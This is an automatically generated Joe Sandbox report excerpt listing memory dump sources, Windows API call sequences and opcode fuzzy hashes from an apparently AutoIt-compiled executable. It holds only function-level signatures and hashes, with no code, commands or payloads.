            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
            • String ID:
            • API String ID: 146765662-0
            • Opcode ID: a793f1290b29d3e51eb0427701abb81fc7dc31c0fdf70dddc4a1e594760fa0ea
            • Instruction ID: 01f1a82b4669149f9d2bf2f118a81c5df638e4bcec6941830efa260aeac38123
            • Opcode Fuzzy Hash: a793f1290b29d3e51eb0427701abb81fc7dc31c0fdf70dddc4a1e594760fa0ea
            • Instruction Fuzzy Hash: 69E0E536004501BBEB115FA1EE0C90ABF3DFF4AB22B108222F265E1068CB379430EB50
            APIs
              • Part of subcall function 00FA7620: _wcslen.LIBCMT ref: 00FA7625
            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0100C6EE
            • _wcslen.LIBCMT ref: 0100C735
            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0100C79C
            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0100C7CA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ItemMenu$Info_wcslen$Default
            • String ID: 0
            • API String ID: 1227352736-4108050209
            • Opcode ID: 51cc2ac6e02aa588f32da0ec8460c263a54f3d013e97753e747857150234246b
            • Instruction ID: 6e549c8a639fbf77ea662eeda5605909c7815c60f2d2811e93fe2174a8f7a2d5
            • Opcode Fuzzy Hash: 51cc2ac6e02aa588f32da0ec8460c263a54f3d013e97753e747857150234246b
            • Instruction Fuzzy Hash: D451D2716043009BF7A69E28CE45B6E7BE8BF49310F040BADFAD9D21D1DB74D9048B52
            APIs
            • ShellExecuteExW.SHELL32(0000003C), ref: 0102AEA3
              • Part of subcall function 00FA7620: _wcslen.LIBCMT ref: 00FA7625
            • GetProcessId.KERNEL32(00000000), ref: 0102AF38
            • CloseHandle.KERNEL32(00000000), ref: 0102AF67
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseExecuteHandleProcessShell_wcslen
            • String ID: <$@
            • API String ID: 146682121-1426351568
            • Opcode ID: 8c3b2c01d65095a9bcad8a7c511e0f8d26c6e9ddc14110fe2ab5329b3636b8da
            • Instruction ID: 548dffc3e22457fbeab4f010a1244cc1a6c8d5850226bb446587cb04c1552444
            • Opcode Fuzzy Hash: 8c3b2c01d65095a9bcad8a7c511e0f8d26c6e9ddc14110fe2ab5329b3636b8da
            • Instruction Fuzzy Hash: 72717B71A00625DFCB14EF54C884A9EBBF4FF09310F048499E856AB792CB79ED45CB90
            APIs
            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 01007206
            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0100723C
            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0100724D
            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 010072CF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorMode$AddressCreateInstanceProc
            • String ID: DllGetClassObject
            • API String ID: 753597075-1075368562
            • Opcode ID: c96615e69125ec8e0021bd9595a2fec3d1c4b939f2b0da6e4042bfab3b2e033f
            • Instruction ID: fc38c9aa9bb173a2a4bfbb08c880119bdb3c1fbe90d15afca4b7b8be9c8fedcb
            • Opcode Fuzzy Hash: c96615e69125ec8e0021bd9595a2fec3d1c4b939f2b0da6e4042bfab3b2e033f
            • Instruction Fuzzy Hash: 38416E71A00204AFEB26CF54C984A9A7FB9EF45310F1580A9BD859F249D7B9E944CBA0
            APIs
            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01033E35
            • IsMenu.USER32(?), ref: 01033E4A
            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01033E92
            • DrawMenuBar.USER32 ref: 01033EA5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Menu$Item$DrawInfoInsert
            • String ID: 0
            • API String ID: 3076010158-4108050209
            • Opcode ID: ed2fd2bd65fe7c62ad46d8fff213c26be9020c63763d6af2e60ec57eafa689ab
            • Instruction ID: 0f4dd0521953bc108adc3bcae366e2491319b3f7c53b5f420654407acd06c6ed
            • Opcode Fuzzy Hash: ed2fd2bd65fe7c62ad46d8fff213c26be9020c63763d6af2e60ec57eafa689ab
            • Instruction Fuzzy Hash: 9C416875A00209AFEB20DF54D8C4EAABBF9FF89350F044169E985AB280D735A945CF60
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 01003CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01003CCA
            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01001E66
            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01001E79
            • SendMessageW.USER32(?,00000189,?,00000000), ref: 01001EA9
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$_wcslen$ClassName
            • String ID: ComboBox$ListBox
            • API String ID: 2081771294-1403004172
            • Opcode ID: e89e86f3ec283adb9a9f199226da2ae453c105bc37c917e2b33c0b92a449f739
            • Instruction ID: 5855c9b5738d9f7e30bf2d90288bcfaf4ca916619529090e57eba340e2da2509
            • Opcode Fuzzy Hash: e89e86f3ec283adb9a9f199226da2ae453c105bc37c917e2b33c0b92a449f739
            • Instruction Fuzzy Hash: 80212671A00108AEFB159B65DD45CFFBBBCEF46390F044129F491A71D1DB7889099A20
            APIs
            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01032F8D
            • LoadLibraryW.KERNEL32(?), ref: 01032F94
            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01032FA9
            • DestroyWindow.USER32(?), ref: 01032FB1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend$DestroyLibraryLoadWindow
            • String ID: SysAnimate32
            • API String ID: 3529120543-1011021900
            • Opcode ID: 693a25562084f829271550ebe83f13680cd824b7c0d1de37b2624322f3cca07f
            • Instruction ID: c80230d4c08d0f0bf2f4ad3e6b6b8fdffff173a035507d74099fa31a30d1744f
            • Opcode Fuzzy Hash: 693a25562084f829271550ebe83f13680cd824b7c0d1de37b2624322f3cca07f
            • Instruction Fuzzy Hash: D1219D72204209AFEB214E68DC80EBB7BEDEF89364F104629FA90E6195D771DC919760
            APIs
            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00FC4D1E,00FD28E9,?,00FC4CBE,00FD28E9,010688B8,0000000C,00FC4E15,00FD28E9,00000002), ref: 00FC4D8D
            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FC4DA0
            • FreeLibrary.KERNEL32(00000000,?,?,?,00FC4D1E,00FD28E9,?,00FC4CBE,00FD28E9,010688B8,0000000C,00FC4E15,00FD28E9,00000002,00000000), ref: 00FC4DC3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AddressFreeHandleLibraryModuleProc
            • String ID: CorExitProcess$mscoree.dll
            • API String ID: 4061214504-1276376045
            APIs
            • LoadLibraryA.KERNEL32 ref: 00FFD3AD
            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FFD3BF
            • FreeLibrary.KERNEL32(00000000), ref: 00FFD3E5
            Similarity
            • API ID: Library$AddressFreeLoadProc
            • String ID: GetSystemWow64DirectoryW$X64
            • API String ID: 145871493-2590602151
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FA4EDD,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E9C
            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4EAE
            • FreeLibrary.KERNEL32(00000000,?,?,00FA4EDD,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4EC0
            Similarity
            • API ID: Library$AddressFreeLoadProc
            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
            • API String ID: 145871493-3689287502
            APIs
            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FE3CDE,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E62
            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4E74
            • FreeLibrary.KERNEL32(00000000,?,?,00FE3CDE,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E87
            Similarity
            • API ID: Library$AddressFreeLoadProc
            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
            • API String ID: 145871493-1355242751
            APIs
            • GetCurrentProcessId.KERNEL32 ref: 0102A427
            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0102A435
            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0102A468
            • CloseHandle.KERNEL32(?), ref: 0102A63D
            Similarity
            • API ID: Process$CloseCountersCurrentHandleOpen
            • String ID:
            • API String ID: 3488606520-0
            APIs
              • Part of subcall function 0100DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0100CF22,?), ref: 0100DDFD
              • Part of subcall function 0100DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0100CF22,?), ref: 0100DE16
              • Part of subcall function 0100E199: GetFileAttributesW.KERNEL32(?,0100CF95), ref: 0100E19A
            • lstrcmpiW.KERNEL32(?,?), ref: 0100E473
            • MoveFileW.KERNEL32(?,?), ref: 0100E4AC
            • _wcslen.LIBCMT ref: 0100E5EB
            • _wcslen.LIBCMT ref: 0100E603
            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0100E650
            Similarity
            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
            • String ID:
            • API String ID: 3183298772-0
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 0102C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0102B6AE,?,?), ref: 0102C9B5
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102C9F1
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA68
              • Part of subcall function 0102C998: _wcslen.LIBCMT ref: 0102CA9E
            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0102BAA5
            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0102BB00
            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0102BB63
            • RegCloseKey.ADVAPI32(?,?), ref: 0102BBA6
            • RegCloseKey.ADVAPI32(00000000), ref: 0102BBB3
            Similarity
            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
            • String ID:
            • API String ID: 826366716-0
            APIs
            • VariantInit.OLEAUT32(?), ref: 01008BCD
            • VariantClear.OLEAUT32 ref: 01008C3E
            • VariantClear.OLEAUT32 ref: 01008C9D
            • VariantClear.OLEAUT32(?), ref: 01008D10
            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 01008D3B
            Similarity
            • API ID: Variant$Clear$ChangeInitType
            • String ID:
            • API String ID: 4136290138-0
            APIs
            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 01018BAE
            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 01018BDA
            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 01018C32
            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 01018C57
            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 01018C5F
            Similarity
            • API ID: PrivateProfile$SectionWrite$String
            • String ID:
            • API String ID: 2832842796-0
            APIs
            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 01028F40
            • GetProcAddress.KERNEL32(00000000,?), ref: 01028FD0
            • GetProcAddress.KERNEL32(00000000,00000000), ref: 01028FEC
            • GetProcAddress.KERNEL32(00000000,?), ref: 01029032
            • FreeLibrary.KERNEL32(00000000), ref: 01029052
              • Part of subcall function 00FBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,01011043,?,753CE610), ref: 00FBF6E6
              • Part of subcall function 00FBF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00FFFA64,00000000,00000000,?,?,01011043,?,753CE610,?,00FFFA64), ref: 00FBF70D
            Similarity
            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
            • String ID:
            • API String ID: 666041331-0
            APIs
            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 01036C33
            • SetWindowLongW.USER32(?,000000EC,?), ref: 01036C4A
            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 01036C73
            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0101AB79,00000000,00000000), ref: 01036C98
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 01036CC7
            Similarity
            • API ID: Window$Long$MessageSendShow
            • String ID:
            • API String ID: 3688381893-0
            APIs
            Similarity
            • API ID: _free
            • String ID:
            • API String ID: 269201875-0
            APIs
            • GetCursorPos.USER32(?), ref: 00FB9141
            • ScreenToClient.USER32(00000000,?), ref: 00FB915E
            • GetAsyncKeyState.USER32(00000001), ref: 00FB9183
            • GetAsyncKeyState.USER32(00000002), ref: 00FB919D
            Similarity
            • API ID: AsyncState$ClientCursorScreen
            • String ID:
            • API String ID: 4210589936-0
            APIs
            • GetInputState.USER32 ref: 010138CB
            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 01013922
            • TranslateMessage.USER32(?), ref: 0101394B
            • DispatchMessageW.USER32(?), ref: 01013955
            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 01013966
            Similarity
            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
            • String ID:
            • API String ID: 2256411358-0
            APIs
            • GetWindowRect.USER32(?,?), ref: 01001915
            • PostMessageW.USER32(00000001,00000201,00000001), ref: 010019C1
            • Sleep.KERNEL32(00000000,?,?,?), ref: 010019C9
            • PostMessageW.USER32(00000001,00000202,00000000), ref: 010019DA
            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 010019E2
            Similarity
            • API ID: MessagePostSleep$RectWindow
            • String ID:
            • API String ID: 3382505437-0
            APIs
            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 01035745
            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0103579D
            • _wcslen.LIBCMT ref: 010357AF
            • _wcslen.LIBCMT ref: 010357BA
            • SendMessageW.USER32(?,00001002,00000000,?), ref: 01035816
            Similarity
            • API ID: MessageSend$_wcslen
            • String ID:
            • API String ID: 763830540-0
            APIs
            • IsWindow.USER32(00000000), ref: 01020951
            • GetForegroundWindow.USER32 ref: 01020968
            • GetDC.USER32(00000000), ref: 010209A4
            • GetPixel.GDI32(00000000,?,00000003), ref: 010209B0
            • ReleaseDC.USER32(00000000,00000003), ref: 010209E8
            Similarity
            • API ID: Window$ForegroundPixelRelease
            • String ID:
            • API String ID: 4156661090-0
            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 00FDCDC6
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FDCDE9
              • Part of subcall function 00FD3820: RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00FDCE0F
            • _free.LIBCMT ref: 00FDCE22
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00FDCE31
            Similarity
            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
            • String ID:
            • API String ID: 336800556-0
            APIs
            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FB9693
            • SelectObject.GDI32(?,00000000), ref: 00FB96A2
            • BeginPath.GDI32(?), ref: 00FB96B9
            • SelectObject.GDI32(?,00000000), ref: 00FB96E2
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ObjectSelect$BeginCreatePath
            • String ID:
            • API String ID: 3225163088-0
            • Opcode ID: e7520c9fe180ea11d1e8a5022b6526e284f726174e660c530785a601a595971d
            • Instruction ID: fb05f45f870f93944cb4a471ec9004eba8961329255d533d2eac4f240857a9c1
            • Opcode Fuzzy Hash: e7520c9fe180ea11d1e8a5022b6526e284f726174e660c530785a601a595971d
            • Instruction Fuzzy Hash: C321D431C16305EFDB209F25DD087E97BB9BB11321F100216F590B60D8D3BA5882EF90
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _memcmp
            • String ID:
            • API String ID: 2931989736-0
            • Opcode ID: b0ac7b3d7c41986fcac26142bc9f3731012a65f895bbb99c78b0e996aeda64f0
            • Instruction ID: 3f8989cfefc6c93245364cba0cb4e5fa1d5c876646f6e4be6c3e2b9037d1af7b
            • Opcode Fuzzy Hash: b0ac7b3d7c41986fcac26142bc9f3731012a65f895bbb99c78b0e996aeda64f0
            • Instruction Fuzzy Hash: 0801B9A1681206BBF71A55156F42FBB739CBF51398F004018FD4C9E282F764EE20A6A1
            APIs
            • GetLastError.KERNEL32(?,?,?,00FCF2DE,00FD3863,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6), ref: 00FD2DFD
            • _free.LIBCMT ref: 00FD2E32
            • _free.LIBCMT ref: 00FD2E59
            • SetLastError.KERNEL32(00000000,00FA1129), ref: 00FD2E66
            • SetLastError.KERNEL32(00000000,00FA1129), ref: 00FD2E6F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ErrorLast$_free
            • String ID:
            • API String ID: 3170660625-0
            • Opcode ID: 8cd30b694a40a021f76b956ac818ffc24638a147621dcbb9c85eecc8859d6637
            • Instruction ID: 7af5ae60307cb90c7001e9affbbd697de6dc0cd3495f3066a2be065e5ebc0bc6
            • Opcode Fuzzy Hash: 8cd30b694a40a021f76b956ac818ffc24638a147621dcbb9c85eecc8859d6637
            • Instruction Fuzzy Hash: 4E01F9329056006BD66236356D45E2F376FABF13B272C042BF5A1E3386EA7DCC0171A1
            APIs
            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?,?,0100035E), ref: 0100002B
            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000046
            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000054
            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?), ref: 01000064
            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FFFF41,80070057,?,?), ref: 01000070
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: From$Prog$FreeStringTasklstrcmpi
            • String ID:
            • API String ID: 3897988419-0
            • Opcode ID: c1f8fca6c3600ff9c359dbf17877e2d4742e353d2808ef9d07d1740dd8e24c44
            • Instruction ID: f38c43f177e09e33f6b049a02682da3e8c19b5d97350f0e4d46671d60ae7f2c5
            • Opcode Fuzzy Hash: c1f8fca6c3600ff9c359dbf17877e2d4742e353d2808ef9d07d1740dd8e24c44
            • Instruction Fuzzy Hash: FF01A776600205BFFB218F69DD08BAA7EEDEF447A1F144115F985E2248DB76DE408760
            APIs
            • QueryPerformanceCounter.KERNEL32(?), ref: 0100E997
            • QueryPerformanceFrequency.KERNEL32(?), ref: 0100E9A5
            • Sleep.KERNEL32(00000000), ref: 0100E9AD
            • QueryPerformanceCounter.KERNEL32(?), ref: 0100E9B7
            • Sleep.KERNEL32 ref: 0100E9F3
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: PerformanceQuery$CounterSleep$Frequency
            • String ID:
            • API String ID: 2833360925-0
            • Opcode ID: 18071b511a1e30f1435efa5ad99a706f23d11caeafd55c99633f921b0882aff8
